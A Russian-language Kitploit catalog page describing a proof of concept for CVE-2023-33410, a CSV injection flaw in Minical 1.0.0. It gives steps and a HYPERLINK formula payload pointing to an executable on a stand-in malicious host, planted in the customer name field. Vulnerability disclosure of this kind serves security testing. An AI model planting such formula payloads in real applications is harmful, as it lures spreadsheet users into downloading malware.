Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-33410 — Доказательство концепции, демонстрирующее уязвимость внедрения CSV в Minical 1.0.0 с помощью вредоносной полезной нагрузки HYPERLINK в поле имени клиента, что приводит к удаленному выполнению кода при загрузке отчета. | Kitploit
Инструменты/GitHubGitHub/thirukrishnan/cve-2023-33410
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubthirukrishnan/cve-2023-33410

CVE-2023-33410

Доказательство концепции, демонстрирующее уязвимость внедрения CSV в Minical 1.0.0 с помощью вредоносной полезной нагрузки HYPERLINK в поле имени клиента, что приводит к удаленному выполнению кода при загрузке отчета.

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-33410

Minical 1.0.0 уязвим для CSV-инъекций.

Разработчик: https://github.com/minical/minical

Демо-приложение: https://demo.minical.io/


PoC

Шаг 1: Перейдите в модуль "Учет" и нажмите "Создать нового клиента".

image

Шаг 2: Введите полезную нагрузку в поле "Имя" и нажмите "Создать".

Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")

image

image

Шаг 3: Нажмите "Скачать CSV-отчет" и обратите внимание, что полезная нагрузка отображается.

image

Скачать инструмент